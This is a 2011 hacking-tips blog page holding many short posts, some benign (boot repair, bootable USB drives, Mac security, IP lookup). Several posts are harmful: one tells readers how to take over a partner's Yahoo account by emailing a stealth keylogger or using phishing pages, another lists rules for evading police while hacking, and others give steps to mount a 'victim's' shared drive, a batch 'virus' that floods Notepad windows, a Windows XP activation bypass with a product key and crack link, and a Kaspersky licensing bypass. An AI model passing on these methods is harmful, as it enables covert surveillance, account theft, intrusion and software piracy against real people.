Tuesday 22 March 2011

How to Trace an IP address Location

Tuesday 22 March 2011 by Sayeed · 0

How to Crack BIOS Password : In Compaq Laptop

by Sayeed · 5

Sunday 20 March 2011

IP Address : what can you do with an IP address


What exactly can someone tell from your IP address and what can they do with it? Can they find personal details or my precise geographical location?



In most cases your IP address is very easy to determine. But how much it says about you, specifically, depends on your ISP and what kind of IP address you have.



Finding someone else's IP can be as easy as looking at the full headers of email that they've sent you or monitoring network connections for certain types of instant messaging and chat applications. Web sites routinely get IP address information for all visitors. The very nature of how the internet works dictates that when two computers talk to each other, they know each other's IP addresses.

But once you've received an IP address, what can you tell about it?

Some IP's are easy - they're static and have a DNS name associated with them. For example, in a Windows XP Command Shell, enter the following command:

ping -a 17.254.3.183

"What if the ping doesn't work or doesn't return a domain name?"

The "-a" switch tells ping to do a "reverse DNS lookup" and print the first domain name it finds associated with the IP address you've specified. In this case, ping should include "apple.com" in its output, which is a domain name assigned to that IP.

With that domain name you can then do a "whois" lookup using whois tools. That information will often include the information about the individual or organization that owns the domain. In this example it does not, but it includes the name of the registrar, markmonitor.com. Visiting that site there is a small "whois" link which when run against "apple.com" returns all the information that you might want. Apple.com is owned, not surprisingly, by Apple Computer, Inc. and full address and contact information is available.

What if the ping doesn't work or doesn't return a domain name? Then things get less precise.

In this case, we go to ARIN and use their IP "whois" tool. If we enter an IP address such as 206.124.145.17, we'll find that it's part of a block of addresses assigned to an ISP. In order to determine who actually is using that IP address, if anyone, the ISP would have to get involved. Note that without their involvement, the physical location of a machine at a specific IP address can not be determined.

Now, it's important to note that an IP address may or may not identify a specific computer. In many cases, such as large corporations, it identifies a gateway of some sort that acts as a router or proxy for any number of computers. Behind the gateway, the computers can all see each other, but from the internet the individual machines are indistinguishable from each other. They all look like they come from the same IP address.

The same is true when you use a router at home. You might have any number of computers behind it, but from the internet, it appears as if you have only one IP address. Your individual computers are not directly accessible by default.

And that leads to my final point: use a router or a firewall. If you connect directly to the internet, then your IP address can be used by others on the network to attempt to connect directly to your PC and exploit any vulnerabilities. By using a router, your computer cannot be contacted directly. Alternately, a firewall blocks the intruders from gaining access to your machine even if they do reach it.

Sunday 20 March 2011 by Sayeed · 0

How to Become a hacker : Point to remmember

The Main point to become a hacker and safe your self



Never Disclose your Identity:
Never tell any body that you are a hacker even your friends or your relatives,you must keep it a secret


Use Proxy:
Never hack without a proxy

Be Careful:
Never let FBI enter your house without a search warrant.

Never Hack from your home:
Never hack from your home always use net cafe for these purposes

Always:
Wave to cops

Use Fake information:
Never use your real name in any sort of conversation or in any signup

Never keep weak passwords:
Do not keep a password which is already present in the dictionary or a password which is very common
etc your pet name,Your country name etc

Password tip:
Dont use same password twice for maximum security

Of course:
Never hack from the same computer twice if possible

Hide your Ip:
Hide your Ip address to avoid your chances of being traced,i have made a post on Hide your IP address

Use Firewall:
Always use a Good firewall such as zonealram

Change your Ip:
Change your Ip address daily if possible,I have wrote an article on How to change your Ip address

Use fake information while signing up:
Dont enter your personal information eg your address,your number etc while
Using social networking sites like orkut,Facebook etc

Most importantly:
Always have a panic button that mass deletes your questionable content

OF course:
Never let the FBI in period.

Yet again:
Always use a Proxy when doing anything remotely illegal

You must say to yourself that you do not follow one of these rules your chances of getting caught are high,This is why the most hackers are caught they forget to hide their identity,hope you liked the post.If you think that this article is worth kindly pass the comments

by Sayeed · 0

Make your Windows XP Genuine


Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3.

Follow these step to Make your windows XP genuine

Step 1:
Click Start and then goto run and type ‘regedit’

Step 2:
Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

and double click on it. Then change some of the value data to any thing.

Step 3:
Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, dont type the quotes)

Step 4:
The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can download all the updates without activating, and the Genuine Microsoft Validation will irritate you No more.

Note: This works better after reformating

Or else do you want to download the crack for XP,XP home,XP 2 and Vista, I am placing it in a zip folder pls download it from the below link

http://rapidshare.com/files/71090926/Crack_For_XP.rar

by Sayeed · 0

Saturday 19 March 2011

How to Trace an Gmail Address

In this article I will tell you to use a great peice of software Email Tracker pro to trace an email, Email tracker pro can trace and track email back to the senders location. Stop SPAM email and phishing email with email tracker pro. The latest version of Email tracker pro is V9, however the program is not free and you will not find many working serials on the web, So I use Email tracker pro v8 for demonstration as I am already placing its crack below:

Trace an Email using emailtrackerpro:

Follow the steps below to use Email tracker pro v8 to trace an Email

1.First of all download Email tracker pro v8 and install it on your computer

2. Open Email tracker pro and click on Trace an email


3. Now you need to paste the Email headers in it, For Gmail I have already demonstrated on how to get Gmail headers in my previous post How to trace a sender in Gmail?, but if you want to trace a hotmail, yahoo or any other email and you are not sure how to get email headers kindly google it

4. Once you click on trace button, it will start tracing and will show you the appropriate location of the email sender

Saturday 19 March 2011 by Sayeed · 0

Friday 18 March 2011

Boot Manager : How to repair boot manager missing error in Windows 7/ Vista

Basically we face this problem while installing the windows some tome the Boot file is missed and this shows the error as show below in the pic to solve this problem read the article

Insert the Windows DVD of Windows7/Vista in your system then follow these steps:

Boot off the Windows Vista DVD and then click Next at the first prompt:

You should see a link in the lower left-hand side for “Repair your computer”


The installation process will attempt to find your Vista installation directory. If there’s more than one in the list, select the correct one and then use the Next button again.

Click the first link for “Startup Repair”

The installation process will repair the system, and then prompt for you to reboot.
Alternatively you could have chosen the Command Prompt option instead, and use the following command to fix the boot options only:
bootrec /fixboot


At this point you should be able to reboot your computer, remove the DVD and everything should be working

Friday 18 March 2011 by Sayeed · 0

Yahoo Hacking : How to hack yahoo

Every day, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating, and ask me how to hack their Yahoo password so as to find out the truth. If you are in a similar situation and wondering to know how to hack a Yahoo password, then this is the post for you. In this post, I will uncover some of the real and working ways to do that.
Is it possible to hack Yahoo?

Yes! As a matter of fact, it is possible to hack almost any email password. But before you learn the real ways of hacking, the following are the things you should be aware of:

1. Never trust any hacking service that claims to hack Yahoo password for just $100 or $200. In most cases they will rip off your pockets with false promises. Sometimes they may even start to threaten you by blackmailing that they are going to inform the victim or the cyber crime officials about your hack attempt. So, to be on the safer side, it is better to stay away from such scam websites.
2. Beware! On many websites and web portals you will often come across a fake tutorial on email hacking. The tutorial will tell you something like “You need to send the target email address along with your username and password to yahoo_pass_reset@yahoo.com (or similar)” to hack the password of the target account. This method seems too good to be true but, if you follow this method, you will lose your own password in attempt to hack someone else’s password.

With my experience of over 7 years in the field of hacking and cyber security, I can tell you that there are only TWO ways to hack Yahoo password. They are keylogging and phishing.

All the other email hacking methods are simply scam or don’t work! The following are the only 2 foolproof methods that work.


1. Keylogging: Easiest Way to Hack Yahoo Password


Using a keylogger is the easiest way to hack Yahoo password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as spy program or spy software. To use it, you don’t need to have any special knowledge. Anyone with a basic knowledge of computer should be able to install and use this software. With my experience, I recommend the following two keyloggers as the best for hacking Yahoo password.

1. SniperSpy (Tested)

2. WinSpy (Tested)


I don’t have physical access to the target computer, can I still use SniperSpy?

Yes, you can! Since both SniperSpy and WinSpy offers Remote Installation Feature, it is possible to remotely install the keylogger on the target computer. However, it will also work on a local computer.

How to use SniperSpy?

1. After you download it, you will be able to create the installation module. You need to email this module to the remote user as an attachment.

2. When the remote user runs the module, it will get installed silently and the monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continuously.

3. You can login to your online SniperSpy account (you get this after purchase) to see the logs which contains the password.

NOTE: If you have physical access to the target computer, you can simply install the module by yourself without the need to email it as an attachment.

The working of Winspy is somewhat similar to that of SniperSpy.

Once I install SniperSpy, can the victim come to know about it’s presence?

No. The victim will not come to know about it’s presence on his/her computer. This is because, after the installation, SniperSpy will run in a total stealth mode. Unlike other spy programs, it will never show up in start-menu, start-up, program files, add/remove programs or task manager.

Can I be traced back if I install it on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s computer.

How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy will neither collect any information from your system nor will contact you in any way unless you request assistance.

What are the other features of SniperSpy software?

1. With SniperSpy, you can gain access to any password protected account including Yahoo, Gmail, Hotmail, MySpace, Facebook etc.

2. This software will not only capture passwords, but will also take screenshots and record chat conversations.

3. This product is extremely easy to use so that, even novice users can install and use it with ease.

SniperSpy vs WinSpy

Click Here to Download SniperSpy for Windows

Click Here to Download SniperSpy for Mac

For more details on keylogger, you can read my post on How to use Keyloggers.
2. Other Ways To Hack Yahoo Password


The other most commonly used trick to hack Yahoo password is by using a fake login Page (also called as Phishing). Today, phishing is the most widely used technique to hack Yahoo password. A fake login page is a page that appears exactly similar to the login pages of sites like Yahoo, Gmail, Facebook etc. The victim is tricked to believe this fake login page to be the real one. But once he/she enters the password there, they end up losing it.

Phishing can be very effective when implemented successfully. But creating a fake login page and taking it online to make the hack attempt successful is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP or JSP.

So, if you are new to the concept of hacking passwords, then I recommend the use of keyloggers as the best to hack Yahoo password


Content from : gohacking.com

by Sayeed · 0

Thursday 17 March 2011

Cracking Wireless Netwrok : By airmon-ng in LINUX

WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping.


It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.
Install aircrack-ng

Thursday 17 March 2011 by Sayeed · 0

Bootable Pendrive : Learn how to make a bootable pendrive without any software

 JUST FOLLOW THE PROCESS STEP BY STEP AND MAKE YOUR BOOTABLE PENDRIVE

1. Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.

2. Open elevated Command Prompt. To do this, type in CMD in Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs >Accessories > right click on Command Prompt and select run as administrator.

3. When the Command Prompt opens, enter the following command:
DISKPART and hit enter.
LIST DISK and hit enter.
Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.

4. In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.
SELECT DISK 1 (Replace DISK 1 with your disk number)
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN

EXIT
Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.

5. Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “D” as my optical (DVD) drive letter and “G” as my USB drive letter.

6. Go back to command prompt and execute the following commands:

6.1. Change directory to the DVD’s boot directory where bootsect lives:
d:
cd d:\boot


6.2. Use bootsect to set the USB as a bootable NTFS drive prepared for a Vista/7 image. I’m assuming that your USB flash drive has been labeled disk G:\ by the computer:
bootsect /nt60 g:

(Where “G” is your USB drive letter)

7. Copy Windows DVD contents to USB.


You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature)
.
Note that this bootable USB guide will not work if you are trying to make a bootable USB on XP computer.

by Sayeed · 0

Secure Your MAC operating System

The area of Mac security software is fairly broad to Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for the Mac OS X, and updates from commonly used applications such as web browser Safari, Adobe Shockwave, and Google Chrome.

In general, Mac users should be kept up-to-date on security fixes for all of the listed primary items above. Applying fixes will be automatic in the case of a program likeGoogle Chrome while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet.
Security vulnerabilities can reach in to Mac email applications as well to where you have what are known as botnets putting out spam email messages using your Mac. That is why you want an antivirus program that is robust and will provide you with security monitoring for emails as well as your hard disk and web site usage. Along with that, it is important to stay current on the latestMac OS X fixes that apply to your operating system. Checking with Apple's website to ensure your current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac securitysoftware issues and fixes for widely-used products such as Safari.


Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-life software so that you are not caught short when it comes to security. The latest trojan horse viruses that are attacking Mac users are also a good thing to be aware of even if you have solid antivirus program software.

Computer security is a big issue and is constantly playing catch up to those who exploit operating systems flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in such ancillary programs the Mac uses such as Java. Java is used heavily for web-based communications andapplications. Exploitations of Java can lead to corruption of your local system hard disk and data files.

To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security software fixes and visit trusted web sites while quickly aborting any unfamiliar web site to you that you were referred to or found wherein you see a lot of pop up advertising and freesoftware checks of your Mac hard disk or statements about your Mac may be infected.

For those Mac users that also run a Windows volume or partition, it is wise to have an equally running antivirus program on the Windows side. There are viruses that will go between both the Windows and Mac sides of your Mac computer. In fact, MS Office products that use visual basic along with macro commands are notorious for impacts from malware and trojans.

The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is that way to go.

by Sayeed · 0

Wednesday 16 March 2011

Connect your Facebook With Twitter Account


Update you twitter with facebook account
  1. Log in to your Facebook account
  2. Now go to this url "http://apps.facebook.com/twitter/"
  3. Add the 'Twitter' Facebook Application.
  4. Choose your preferred settings and click on"Add twitter"
  5. No log into your twitter account
  6. Allow and Authorize Access for Twitter to Facebook. That's all! Every time you update your Twitter, your Facebook status will update automatically!

Wednesday 16 March 2011 by Sayeed · 0

Create a Virus in 1 minute

Make your freind fool 

Go to Notepad
Then type

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

by Sayeed · 0

How to Trace the location with IP address


Just go to Locate IP address and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.

1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.
A sample snapshot of the results from ip2location.com is given below
trace ip address

Hope you had enjoyed the article,Kindly show your feedback by Comments

by Sayeed · 1

Hack into another Computer


Step 1
First of all,get a good IP scanner angry ip scanner is a good one Download  it from the website:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

 This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace

an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere


Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive


Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

by Sayeed · 0

Windows XP - Repair "access denied" Massage



How to Repair ur XP when it Show "access denied"

Click on Start, Search, All Files and Folders.

Right-click on file and choose properties

file location example: c:\windows\system32\undeleteablefile.exe


Open a Command Prompt window

Again Click on Start button, Run and type TASKMGR.EXE and press Enter to start Task manager
Click on the Processes tab, click on the process named Explorer.exe and click on End Process.

Minimize Task Manager.

Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command.

cd \windows\system32

Type DEL where is the file you wish to delete.

Example: del undeletablefile.exe

Go back to Task Manager

In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.

Close Task Manager and the file is deleted.

by Sayeed · 0

Use Kaspersky Free

Kaspersky is one of the world,s best antiviruses,but unfortunately its full version is not availible,there are many keys availible online but believe me these are only to waste your time,Your all efforts will end in smoke.
I am posting here a method to use kaspersky antivirus without a key (Temp. sol. if ur key is not Valid)

Just follow the steps:

you need to back up first in case any thing goes wrong

1.( Run ) type ( regedit ) press ( OK ).

1- Go To ( HKEY_LOCAL_MACHINESOFTWAREKasperskyLabAVP6Data ) & right click on ( Data ) & choose ( Permissions ).

2- choose ( Advanced ) From The ( Permissions For Data ) ... a new window will open.

3- On ( Advanced Security Settings for Data ) window .. look for ( Inherit from parent ... ) click on the nike or check mark to remove or uncheck it.

4- After removing the check or nike mark u will get a new message .. choose ( Remove ).

5- On ( Advanced security Settings for Data ) click on ( Apply ).

6- choose ( Yes ) for the new message that u will get.

7- Press ( OK ) on ( Advanced security Settings for Data ).

8- Press ( OK ) on ( Permissions For Data ).

9- Exit KasperSky & restart it again.

by Sayeed · 0